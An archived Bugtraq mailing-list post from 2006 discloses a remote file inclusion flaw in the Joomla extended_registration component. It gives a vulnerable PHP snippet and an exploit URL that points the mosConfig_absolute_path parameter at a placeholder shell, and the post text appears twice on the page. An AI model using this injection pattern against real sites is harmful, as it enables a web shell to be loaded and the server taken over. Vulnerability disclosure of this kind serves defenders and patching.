Threat level definition
Search:
Home
Bugtraq
Vulnerabilities
Mailing Lists
Jobs
Tools
Beta Programs
News
Infocus
Foundations
Microsoft
Unix
IDS
Incidents
Virus
Pen-Test
Firewalls
Columnists
Mailing Lists
Newsletters
Bugtraq
Focus on IDS
Focus on Linux
Focus on Microsoft
Forensics
Pen-test
Security Basics
Vuln Dev
Vulnerabilities
Jobs
Job Opportunities
Resumes
Job Seekers
Employers
Tools
RSS
News
Vulns
Security Research
BugTraq
Back to list
|
Post reply
Joomla extended_registration mod Remote File Include Vulnerabilities
Oct 26 2006 03:45PM
crackers_child sibersavascilar com
!!!!!!!!!WWW.SiBERSAVASCiLAR.COM!!!!!!!!!
------------------------------------------------------------------------
--------
Title : Joomla extended_registration mod Remote File Include Vulnerabilities
------------------------------------------------------------------------
--------
#Author: Crackers_Child
#cont@ct: crackers_child (at) sibersavascilar (dot) com [email concealed]
------------------------------------------------------------------------
--------
Bug in admin.extended_registration.php
<?php
require("../configuration.php");
function extended_registration_settings($state,$lang) {
global $mosConfig_absolute_path;
------------------------------------------------------------------------
--------
Exploit:
www.site.com/administrator/components/com_extended_registration/admin.ex
tended_registration.php?mosConfig_absolute_path=Shel3l?
------------------------------------------------------------------------
--------
greets:
X_ALPEREN_X and All SiberSavascilar.CoM Members !
------------------------------------------------------------------------
--------
--------------------------------- [ WWW.SiBERSAVASCiLAR.COM ] --------------------------------------
[ reply ]
Privacy Statement
Copyright 2009, SecurityFocus
------------------------------------------------------------------------
--------
Title : Joomla extended_registration mod Remote File Include Vulnerabilities
------------------------------------------------------------------------
--------
#Author: Crackers_Child
#cont@ct: crackers_child (at) sibersavascilar (dot) com [email concealed]
------------------------------------------------------------------------
--------
Bug in admin.extended_registration.php
<?php
require("../configuration.php");
function extended_registration_settings($state,$lang) {
global $mosConfig_absolute_path;
------------------------------------------------------------------------
--------
Exploit:
www.site.com/administrator/components/com_extended_registration/admin.ex
tended_registration.php?mosConfig_absolute_path=Shel3l?
------------------------------------------------------------------------
--------
greets:
X_ALPEREN_X and All SiberSavascilar.CoM Members !
------------------------------------------------------------------------
--------
--------------------------------- [ WWW.SiBERSAVASCiLAR.COM ] --------------------------------------
[ reply ]